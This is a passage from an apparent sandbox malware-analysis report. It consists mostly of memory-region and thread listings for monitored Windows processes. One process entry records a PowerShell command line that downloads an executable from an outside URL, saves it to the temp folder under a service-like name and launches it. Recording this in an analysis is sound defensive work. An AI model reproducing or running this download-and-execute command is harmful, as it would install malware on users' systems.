	        start_va = 0x7ffc154e0000
	          end_va = 0x7ffc15586fff
	     entry_point = 0x7ffc154e0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 206
	        start_va = 0x7ffc10810000
	          end_va = 0x7ffc108a5fff
	     entry_point = 0x7ffc10810000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 207
	        start_va = 0x58d00c0000
	          end_va = 0x58d00fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000058d00c0000"
	        filename = ""

Region:
	              id = 208
	        start_va = 0x1d98b1c0000
	          end_va = 0x1d98b1cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d98b1c0000"
	        filename = ""

Region:
	              id = 209
	        start_va = 0x1d98b280000
	          end_va = 0x1d98b5b6fff
	     entry_point = 0x1d98b280000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 210
	        start_va = 0x1d98b5c0000
	          end_va = 0x1d98b7d2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d98b5c0000"
	        filename = ""

Region:
	              id = 211
	        start_va = 0x1d98b7e0000
	          end_va = 0x1d98b9fdfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d98b7e0000"
	        filename = ""

Region:
	              id = 212
	        start_va = 0x1d98ba00000
	          end_va = 0x1d98bb17fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d98ba00000"
	        filename = ""

Region:
	              id = 213
	        start_va = 0x1d98bb20000
	          end_va = 0x1d98bd37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d98bb20000"
	        filename = ""

Region:
	              id = 214
	        start_va = 0x1d98bd40000
	          end_va = 0x1d98be54fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d98bd40000"
	        filename = ""

Region:
	              id = 215
	        start_va = 0x7ffc12ae0000
	          end_va = 0x7ffc12c39fff
	     entry_point = 0x7ffc12ae0000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 216
	        start_va = 0x1d9898a0000
	          end_va = 0x1d9898a3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d9898a0000"
	        filename = ""

Region:
	              id = 217
	        start_va = 0x1d98be60000
	          end_va = 0x1d98bf1bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d98be60000"
	        filename = ""

Region:
	              id = 218
	        start_va = 0x7ffc0fcd0000
	          end_va = 0x7ffc0fcf1fff
	     entry_point = 0x7ffc0fcd0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 219
	        start_va = 0x7ffc103c0000
	          end_va = 0x7ffc103d2fff
	     entry_point = 0x7ffc103c0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 220
	        start_va = 0x7ffc11a60000
	          end_va = 0x7ffc11ab5fff
	     entry_point = 0x7ffc11a60000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 221
	        start_va = 0x1d9898b0000
	          end_va = 0x1d9898b6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d9898b0000"
	        filename = ""

Region:
	              id = 222
	        start_va = 0x1d9898c0000
	          end_va = 0x1d9898c0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d9898c0000"
	        filename = ""

Region:
	              id = 223
	        start_va = 0x1d9898d0000
	          end_va = 0x1d9898d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d9898d0000"
	        filename = ""

Region:
	              id = 224
	        start_va = 0x1d9898e0000
	          end_va = 0x1d9898e1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d9898e0000"
	        filename = ""

Region:
	              id = 225
	        start_va = 0x1d9898f0000
	          end_va = 0x1d9898f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d9898f0000"
	        filename = ""

Region:
	              id = 226
	        start_va = 0x1d989b90000
	          end_va = 0x1d989b90fff
	     entry_point = 0x1d989b90000
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 227
	        start_va = 0x1d98b140000
	          end_va = 0x1d98b141fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d98b140000"
	        filename = ""

Region:
	              id = 228
	        start_va = 0x1d98b1d0000
	          end_va = 0x1d98b25bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d98b1d0000"
	        filename = ""

Region:
	              id = 229
	        start_va = 0x1d98bf20000
	          end_va = 0x1d98c115fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d98bf20000"
	        filename = ""

Region:
	              id = 230
	        start_va = 0x7ffc08b50000
	          end_va = 0x7ffc08dc3fff
	     entry_point = 0x7ffc08b50000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")


Thread:
	id = 2
	os_tid = 0x814


Thread:
	id = 3
	os_tid = 0xa18


Thread:
	id = 4
	os_tid = 0xde4


Thread:
	id = 5
	os_tid = 0xe38


Process:
	id = "3"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x37c44000"
	os_pid = "0xff8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xd40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" $svabjzvv = New-Object -ComObject Msxml2.XMLHTTP; $iadjti = New-Object -ComObject ADODB.Stream; $iyfigisyb = $env:temp + '\\SMSvcHost32.exe';$svabjzvv.open('GET', 'http://amd.martatovaglieri.it/upll?26201', $false);$svabjzvv.send(); if($svabjzvv.Status -eq \"200\"){$iadjti.open();$iadjti.type = 1;$iadjti.write($svabjzvv.responseBody);$iadjti.position = 0;$iadjti.savetofile($iyfigisyb);$iadjti.close();} Start-Process $iyfigisyb;"
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 327
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 328
	        start_va = 0x184b200000
	          end_va = 0x184b3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b200000"
	        filename = ""

Region:
	              id = 329
	        start_va = 0x184b400000
	          end_va = 0x184b47ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b400000"
	        filename = ""

Region:
	              id = 330
	        start_va = 0x150452d0000
	          end_va = 0x150452effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150452d0000"
	        filename = ""

Region:
	              id = 331
	        start_va = 0x150452f0000
	          end_va = 0x15045304fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000150452f0000"
	        filename = ""

Region:
	              id = 332
	        start_va = 0x15045310000
	          end_va = 0x15045313fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045310000"
	        filename = ""

Region:
	              id = 333
	        start_va = 0x15045320000
	          end_va = 0x15045320fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045320000"
	        filename = ""

Region:
	              id = 334
	        start_va = 0x15045330000
	          end_va = 0x15045331fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045330000"
	        filename = ""

Region:
	              id = 335
	        start_va = 0x7df5fff90000
	          end_va = 0x7ff5fff8ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5fff90000"
	        filename = ""

Region:
	              id = 336
	        start_va = 0x7ff7f4620000
	          end_va = 0x7ff7f4642fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7f4620000"
	        filename = ""

Region:
	              id = 337
	        start_va = 0x7ff7f50e0000
	          end_va = 0x7ff7f5157fff
	     entry_point = 0x7ff7f50e0000
	     region_type = mapped_file
	            name = "powershell.exe"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")

Region:
	              id = 338
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 339
	        start_va = 0x150454d0000
	          end_va = 0x150455cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150454d0000"
	        filename = ""

Region:
	              id = 340
	        start_va = 0x7ffc12840000
	          end_va = 0x7ffc12a27fff
	     entry_point = 0x7ffc12840000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 341
	        start_va = 0x7ffc145f0000
	          end_va = 0x7ffc1469cfff
	     entry_point = 0x7ffc145f0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 411
	        start_va = 0x184b480000
	          end_va = 0x184b4fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b480000"
	        filename = ""

Region:
	              id = 412
	        start_va = 0x150452d0000
	          end_va = 0x150452dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000150452d0000"
	        filename = ""

Region:
	              id = 413
	        start_va = 0x150452e0000
	          end_va = 0x150452e6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150452e0000"
	        filename = ""

Region:
	              id = 414
	        start_va = 0x15045340000
	          end_va = 0x150453fdfff
	     entry_point = 0x15045340000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 415
	        start_va = 0x15045740000
	          end_va = 0x1504574ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045740000"
	        filename = ""

Region:
	              id = 416
	        start_va = 0x7ff7f4520000
	          end_va = 0x7ff7f461ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7f4520000"
	        filename = ""

Region:
	              id = 417
	        start_va = 0x7ffbf8c80000
	          end_va = 0x7ffbf8ce7fff
	     entry_point = 0x7ffbf8c80000
	     region_type = mapped_file
	            name = "mscoree.dll"
	        filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")

Region:
	              id = 418
	        start_va = 0x7ffc04bd0000
	          end_va = 0x7ffc04bedfff
	     entry_point = 0x7ffc04bd0000
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")

Region:
	              id = 419
	        start_va = 0x7ffc12670000
	          end_va = 0x7ffc126d9fff
	     entry_point = 0x7ffc12670000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 420
	        start_va = 0x7ffc141a0000
	          end_va = 0x7ffc14325fff
	     entry_point = 0x7ffc141a0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 421
	        start_va = 0x7ffc14700000
	          end_va = 0x7ffc1481bfff
	     entry_point = 0x7ffc14700000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 422
	        start_va = 0x7ffc148c0000
	          end_va = 0x7ffc14b3cfff
	     entry_point = 0x7ffc148c0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 423
	        start_va = 0x7ffc14bb0000
	          end_va = 0x7ffc14cf2fff
	     entry_point = 0x7ffc14bb0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 424
	        start_va = 0x7ffc14d10000
	          end_va = 0x7ffc14e65fff
	     entry_point = 0x7ffc14d10000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 425
	        start_va = 0x7ffc152a0000
	          end_va = 0x7ffc15360fff
	     entry_point = 0x7ffc152a0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 426
	        start_va = 0x7ffc15480000
	          end_va = 0x7ffc154dafff
	     entry_point = 0x7ffc15480000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 427
	        start_va = 0x7ffc154e0000
	          end_va = 0x7ffc15586fff
	     entry_point = 0x7ffc154e0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 428
	        start_va = 0x7ffc15590000
	          end_va = 0x7ffc1562cfff
	     entry_point = 0x7ffc15590000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 429
	        start_va = 0x15045400000
	          end_va = 0x15045406fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045400000"
	        filename = ""

Region:
	              id = 430
	        start_va = 0x15045410000
	          end_va = 0x15045411fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045410000"
	        filename = ""

Region:
	              id = 431
	        start_va = 0x15045420000
	          end_va = 0x15045420fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045420000"
	        filename = ""

Region:
	              id = 432
	        start_va = 0x15045430000
	          end_va = 0x15045432fff
	     entry_point = 0x15045430000
	     region_type = mapped_file
	            name = "powershell.exe.mui"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui")

Region:
	              id = 433
	        start_va = 0x15045440000
	          end_va = 0x15045440fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045440000"
	        filename = ""

Region:
	              id = 434
	        start_va = 0x15045450000
	          end_va = 0x15045450fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045450000"
	        filename = ""

Region:
	              id = 435
	        start_va = 0x15045460000
	          end_va = 0x15045466fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045460000"
	        filename = ""

Region:
	              id = 436
	        start_va = 0x15045750000
	          end_va = 0x150458d7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045750000"
	        filename = ""

Region:
	              id = 437
	        start_va = 0x150458e0000
	          end_va = 0x15045a60fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000150458e0000"
	        filename = ""

Region:
	              id = 438
	        start_va = 0x15045a70000
	          end_va = 0x15046e6ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045a70000"
	        filename = ""

Region:
	              id = 439
	        start_va = 0x15047060000
	          end_va = 0x1504706ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015047060000"
	        filename = ""

Region:
	              id = 440
	        start_va = 0x7ffbf8be0000
	          end_va = 0x7ffbf8c77fff
	     entry_point = 0x7ffbf8be0000
	     region_type = mapped_file
	            name = "mscoreei.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")

Region:
	              id = 441
	        start_va = 0x7ffc14820000
	          end_va = 0x7ffc1485afff
	     entry_point = 0x7ffc14820000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 442
	        start_va = 0x7ffc14860000
	          end_va = 0x7ffc148b1fff
	     entry_point = 0x7ffc14860000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 443
	        start_va = 0x7ffc11cd0000
	          end_va = 0x7ffc11cdefff
	     entry_point = 0x7ffc11cd0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 444
	        start_va = 0x7ffc07370000
	          end_va = 0x7ffc07379fff
	     entry_point = 0x7ffc07370000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")

Region:
	              id = 445
	        start_va = 0x7ffbf8150000
	          end_va = 0x7ffbf8246fff
	     entry_point = 0x7ffbf8150000
	     region_type = mapped_file
	            name = "msvcr120_clr0400.dll"
	        filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll")

Region:
	              id = 446
	        start_va = 0x7ffbf8250000
	          end_va = 0x7ffbf8bddfff
	     entry_point = 0x7ffbf8250000
	     region_type = mapped_file
	            name = "clr.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll")

Region:
	              id = 447
	        start_va = 0x184b500000
	          end_va = 0x184b57ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b500000"
	        filename = ""

Region:
	              id = 448
	        start_va = 0x15045470000
	          end_va = 0x15045470fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045470000"
	        filename = ""

Region:
	              id = 449
	        start_va = 0x15045480000
	          end_va = 0x1504548ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045480000"
	        filename = ""

Region:
	              id = 450
	        start_va = 0x15045490000
	          end_va = 0x1504549ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045490000"
	        filename = ""

Region:
	              id = 451
	        start_va = 0x150454a0000
	          end_va = 0x150454a0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150454a0000"
	        filename = ""

Region:
	              id = 452
	        start_va = 0x150454b0000
	          end_va = 0x150454b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150454b0000"
	        filename = ""

Region:
	              id = 453
	        start_va = 0x15045600000
	          end_va = 0x1504560ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045600000"
	        filename = ""

Region:
	              id = 454
	        start_va = 0x15045610000
	          end_va = 0x1504561ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045610000"
	        filename = ""

Region:
	              id = 455
	        start_va = 0x7ffb98ae0000
	          end_va = 0x7ffb98aeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98ae0000"
	        filename = ""

Region:
	              id = 456
	        start_va = 0x7ffb98af0000
	          end_va = 0x7ffb98afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98af0000"
	        filename = ""

Region:
	              id = 457
	        start_va = 0x7ffb98b00000
	          end_va = 0x7ffb98b8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98b00000"
	        filename = ""

Region:
	              id = 458
	        start_va = 0x7ffb98b90000
	          end_va = 0x7ffb98bfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98b90000"
	        filename = ""

Region:
	              id = 459
	        start_va = 0x15045620000
	          end_va = 0x1504568ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045620000"
	        filename = ""

Region:
	              id = 460
	        start_va = 0x15046e70000
	          end_va = 0x15046f72fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015046e70000"
	        filename = ""

Region:
	              id = 461
	        start_va = 0x15047070000
	          end_va = 0x1505f06ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015047070000"
	        filename = ""

Region:
	              id = 462
	        start_va = 0x184b580000
	          end_va = 0x184b5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b580000"
	        filename = ""

Region:
	              id = 463
	        start_va = 0x1505f070000
	          end_va = 0x1505f3a6fff
	     entry_point = 0x1505f070000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 464
	        start_va = 0x7ffbf6bf0000
	          end_va = 0x7ffbf80b5fff
	     entry_point = 0x7ffbf6bf0000
	     region_type = mapped_file
	            name = "mscorlib.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll")

Region:
	              id = 465
	        start_va = 0x150454c0000
	          end_va = 0x150454cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150454c0000"
	        filename = ""

Region:
	              id = 466
	        start_va = 0x15046f80000
	          end_va = 0x1504705cfff
	     entry_point = 0x15046f80000
	     region_type = mapped_file
	            name = "rpcss.dll"
	        filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")

Region:
	              id = 467
	        start_va = 0x7ff7f4470000
	          end_va = 0x7ff7f447ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff7f4470000"
	        filename = ""

Region:
	              id = 468
	        start_va = 0x7ff7f4480000
	          end_va = 0x7ff7f451ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff7f4480000"
	        filename = ""

Region:
	              id = 469
	        start_va = 0x150455d0000
	          end_va = 0x150455dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150455d0000"
	        filename = ""

Region:
	              id = 470
	        start_va = 0x1505f5a0000
	          end_va = 0x1505f5affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505f5a0000"
	        filename = ""

Region:
	              id = 471
	        start_va = 0x7ffbf5590000
	          end_va = 0x7ffbf563bfff
	     entry_point = 0x7ffbf5590000
	     region_type = mapped_file
	            name = "microsoft.powershell.consolehost.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\8cf70b5e577ba82747ca2b8794282fc0\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\8cf70b5e577ba82747ca2b8794282fc0\\microsoft.powershell.consolehost.ni.dll")

Region:
	              id = 472
	        start_va = 0x7ffbf5640000
	          end_va = 0x7ffbf5fc0fff
	     entry_point = 0x7ffbf5640000
	     region_type = mapped_file
	            name = "system.core.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\5290f26e6772518e2dd9d9c55bcc9a10\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\5290f26e6772518e2dd9d9c55bcc9a10\\system.core.ni.dll")

Region:
	              id = 473
	        start_va = 0x7ffbf5fd0000
	          end_va = 0x7ffbf6be3fff
	     entry_point = 0x7ffbf5fd0000
	     region_type = mapped_file
	            name = "system.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cb0700ff6398b8e9d0d936cfc4894ba1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\cb0700ff6398b8e9d0d936cfc4894ba1\\system.ni.dll")

Region:
	              id = 474
	        start_va = 0x7ffc115d0000
	          end_va = 0x7ffc115e6fff
	     entry_point = 0x7ffc115d0000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")

Region:
	              id = 475
	        start_va = 0x7ffc11260000
	          end_va = 0x7ffc11293fff
	     entry_point = 0x7ffc11260000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")

Region:
	              id = 476
	        start_va = 0x7ffc11b80000
	          end_va = 0x7ffc11ba8fff
	     entry_point = 0x7ffc11b80000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 477
	        start_va = 0x7ffc116f0000
	          end_va = 0x7ffc116fafff
	     entry_point = 0x7ffc116f0000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 478
	        start_va = 0x7ffb98c00000
	          end_va = 0x7ffb98c3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98c00000"
	        filename = ""

Region:
	              id = 479
	        start_va = 0x7ffb98c40000
	          end_va = 0x7ffb98c4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98c40000"
	        filename = ""

Region:
	              id = 480
	        start_va = 0x7ffbf3530000
	          end_va = 0x7ffbf5538fff
	     entry_point = 0x7ffbf3530000
	     region_type = mapped_file
	            name = "system.management.automation.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\9d927f510e0c82ae9e818bc5d128b32d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\9d927f510e0c82ae9e818bc5d128b32d\\system.management.automation.ni.dll")

Region:
	              id = 481
	        start_va = 0x150455e0000
	          end_va = 0x150455e4fff
	     entry_point = 0x150455e0000
	     region_type = mapped_file
	            name = "winnlsres.dll"
	        filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")

Region:
	              id = 482
	        start_va = 0x15045690000
	          end_va = 0x150456f1fff
	     entry_point = 0x15045690000
	     region_type = mapped_file
	            name = "mscorrc.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll")

Region:
	              id = 483
	        start_va = 0x150455f0000
	          end_va = 0x150455fffff
	     entry_point = 0x150455f0000
	     region_type = mapped_file
	            name = "winnlsres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")

Region:
	              id = 484
	        start_va = 0x7ffc15400000
	          end_va = 0x7ffc15407fff
	     entry_point = 0x7ffc15400000
	     region_type = mapped_file
